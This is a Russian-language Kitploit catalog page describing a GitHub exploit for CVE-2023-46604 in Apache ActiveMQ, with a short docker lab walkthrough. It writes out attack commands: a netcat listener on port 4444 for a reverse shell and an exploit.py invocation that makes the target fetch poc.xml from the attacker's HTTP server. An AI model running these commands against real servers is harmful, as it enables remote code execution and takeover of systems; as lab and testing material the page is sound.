Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-46604 — Эксплойт для CVE-2023-46604 в Apache ActiveMQ, обеспечивающий удалённое выполнение кода через специально сформированные XML-нагрузки и установку обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/ccievoice2009/cve-2023-46604
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubccievoice2009/cve-2023-46604

CVE-2023-46604

Эксплойт для CVE-2023-46604 в Apache ActiveMQ, обеспечивающий удалённое выполнение кода через специально сформированные XML-нагрузки и установку обратной оболочки.

Репозиторий
361 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-46604

image

Соберите docker-compose, содержащий два образа: машина жертвы и машина цели, в соответствии с требуемой средой. На машине жертвы запустите ActiveMQ.

Переключитесь на машину атакующего: • Откройте HTTP-сервис для отправки эксплойта: python3 -m http.server

• Используйте netcat для прослушивания входящих подключений к машине атакующего: nc -nlvp 4444

• Отправьте полезную нагрузку для создания обратного подключения reverse shell к машине атакующего: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Где:

  • Exploit.py: файл с кодом эксплуатации уязвимости
  • -i 172.18.0.3: IP-адрес машины, отправляющей полезную нагрузку
  • -p 61616: порт, на котором ActiveMQ на машине жертвы прослушивает соединения
  • --xml http://172.18.0.2:8000/poc.xml: URL-адрес файла poc.xml на машине атакующего

Можно заметить, что после выполнения команды с файлом 'exploit.py' код эксплуатации отправляет пакет 'poc.xml' с веб-сервера на цель — адрес сервиса ActiveMQ, запущенного на целевом сервере. При этом HTTP-веб-сервер на машине атакующего также получает запрос, отправленный с IP-адреса целевой машины.

После отправки полезной нагрузки переключитесь на терминал, который прослушивает порт 4444 на машине атакующего. Мы видим, что reverse shell с машины жертвы был получен.

Скачать инструмент